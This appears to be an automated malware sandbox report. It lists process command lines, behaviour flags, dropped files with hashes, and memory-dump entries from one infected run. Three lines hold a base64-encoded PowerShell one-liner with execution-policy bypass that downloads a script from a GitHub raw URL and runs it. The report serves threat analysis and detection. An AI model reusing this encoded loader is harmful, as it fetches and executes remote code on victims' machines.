C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.dllFilesize
3KB
MD5d26a52fdd0d406f91aad441900651e14
SHA1ae0747804ce277ed45b3e5bbdbe918b3f45c23f0
SHA25608cc742d6cce43274fd3cc3b4dc7210fc9636624400a984a2fb79205451c8aa6
SHA512af25ddc44217b32782680123927aba21accf761285812d5c6ff23d4f42fc6bbc3f1d07a47a900afaaf5763dea1208ee26850e4526272a5237aceffa5e4c42e0f
-
C:\Users\Admin\AppData\Local\Temp\RESEDDF.tmpFilesize
1KB
MD55bbe07c9b2e799c41cb6b6b515ca8073
SHA138e4db880905ca9d9fef243ea7d4d274110aef7d
SHA256313ab97945563ad3048ca11de1011301f4ed3c20677462ed3153be800b416299
SHA51268750f3f95eca71e274113209911de7a5f29c2a021b527cbb40366b0ac28bda38a79ac93d6b2263db909ff4289f66ee7ce06eba0eaea49fb47e1bc5b12624929
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1Filesize
3.0MB
MD5bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
SHA51278c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipFilesize
2.3MB
MD542c2a160d2d191e6ffcc1076b4734ee2
SHA1c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
SHA2562b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
SHA5123b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Windows\Branding\mediasrv.pngFilesize
55KB
MD5f357d4e7b83bc0a41c65d97f3e6f50f4
SHA171db3180a8ada6d5d7722c54a5940c3490f78636
SHA256db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
C:\Windows\Branding\mediasvc.pngFilesize
944KB
MD5d5de6f599d9807bac2f5a8e751a8c38f
SHA19e70edf56b6a5768fda84232e9c557e750d3631b
SHA25618207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.0.csFilesize
507B
MD56f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.cmdlineFilesize
369B
MD58f1bbafbfab3cd4ffc56e35a9e4d0dcf
SHA11ae4efebf775275c207567c1026e771a2910788a
SHA256c0f601ff829001efbc50c911eef95947d7e20eefb5fe36a09beca03625981c2a
SHA512b1d802f777fcd9a3ec8343eca038ed1ee2cf76261262edbdd460d3de9d7ef73a61ebcd9151fc81900e0873153e3548ca437556ade3b3fa04af237a7add6cc43d
-
\??\c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\CSC9AEA88AD1398439A97F918B61E789921.TMPFilesize
652B
MD55713fd0890bda27ccdeb3986588563c4
SHA1f85141760d3415da16f3decd58902045ba332f94
SHA2564633d2a2e9fdb49ab242b7f4228986ebc5901a33df5b1929539bda6a59879a75
SHA5129626ee201da4854974df2e7af297839390ae22287af3f9ce2bf9a140e299a433d3ba260cdf95a435f29caacc78f9dd43e654676ab88fedd074cb579bc872874d
-
memory/220-159-0x0000000000000000-mapping.dmp
-
memory/404-152-0x0000000000000000-mapping.dmp
-
memory/540-177-0x0000000000000000-mapping.dmp
-
memory/952-175-0x0000000000000000-mapping.dmp
-
memory/1084-181-0x0000000000000000-mapping.dmp
-
memory/1088-165-0x0000000000000000-mapping.dmp
-
memory/1108-140-0x0000000000000000-mapping.dmp
-
memory/1132-182-0x0000000000000000-mapping.dmp
-
memory/1452-186-0x0000000000000000-mapping.dmp
-
memory/1648-154-0x0000000000000000-mapping.dmp
-
memory/1756-134-0x000002482C330000-0x000002482C352000-memory.dmpFilesize
136KB
-
memory/1756-133-0x0000000000000000-mapping.dmp
-
memory/1756-137-0x000002482C510000-0x000002482C512000-memory.dmpFilesize
8KB
-
memory/1756-139-0x000002482C516000-0x000002482C518000-memory.dmpFilesize
8KB
-
memory/1756-138-0x000002482C513000-0x000002482C515000-memory.dmpFilesize
8KB
-
memory/1756-136-0x00007FFDDBD90000-0x00007FFDDC851000-memory.dmpFilesize
10.8MB
-
memory/1976-155-0x0000000000000000-mapping.dmp
-
memory/2132-188-0x0000000000000000-mapping.dmp
-
memory/2156-164-0x0000000000000000-mapping.dmp
-
memory/2200-147-0x0000000000000000-mapping.dmp
-
memory/2240-187-0x0000000000000000-mapping.dmp
-
memory/2332-162-0x0000000000000000-mapping.dmp
-
memory/2340-183-0x0000000000000000-mapping.dmp
-
memory/2448-184-0x0000000000000000-mapping.dmp
-
memory/2940-158-0x0000000000000000-mapping.dmp
-
memory/2964-167-0x0000000000000000-mapping.dmp
-
memory/3156-163-0x0000000000000000-mapping.dmp
-
memory/3348-168-0x0000000000000000-mapping.dmp
-
memory/3352-173-0x0000000000000000-mapping.dmp
-
memory/3412-172-0x0000000000000000-mapping.dmp
-
memory/3500-150-0x0000000000000000-mapping.dmp
-
memory/3512-151-0x0000000000000000-mapping.dmp
-
memory/3712-143-0x0000000000000000-mapping.dmp
-
memory/3860-149-0x0000000000000000-mapping.dmp
-
memory/3964-178-0x0000000000000000-mapping.dmp
-
memory/3984-179-0x0000000000000000-mapping.dmp
-
memory/4028-166-0x0000000000000000-mapping.dmp
-
memory/4068-174-0x0000000000000000-mapping.dmp
-
memory/4120-160-0x0000000000000000-mapping.dmp
-
memory/4232-156-0x0000000000000000-mapping.dmp
-
memory/4324-180-0x0000000000000000-mapping.dmp
-
memory/4368-189-0x0000000000000000-mapping.dmp
-
memory/4368-193-0x0000019A42FC6000-0x0000019A42FC8000-memory.dmpFilesize
8KB
-
memory/4368-192-0x0000019A42FC3000-0x0000019A42FC5000-memory.dmpFilesize
8KB
-
memory/4368-191-0x0000019A42FC0000-0x0000019A42FC2000-memory.dmpFilesize
8KB
-
memory/4368-190-0x00007FFDDBB50000-0x00007FFDDC611000-memory.dmpFilesize
10.8MB
-
memory/4600-157-0x0000000000000000-mapping.dmp
-
memory/4860-185-0x0000000000000000-mapping.dmp
-
memory/4984-131-0x0000000000040000-0x00000000004F8000-memory.dmpFilesize
4.7MB
-
memory/4984-132-0x00000000029F0000-0x0000000002E9C000-memory.dmpFilesize
4.7MB
-
memory/4984-130-0x00000000026AC000-0x00000000029E9000-memory.dmpFilesize
3.2MB
-
memory/5004-153-0x0000000000000000-mapping.dmp
-
memory/5064-176-0x0000000000000000-mapping.dmp
-
memory/5096-161-0x0000000000000000-mapping.dmp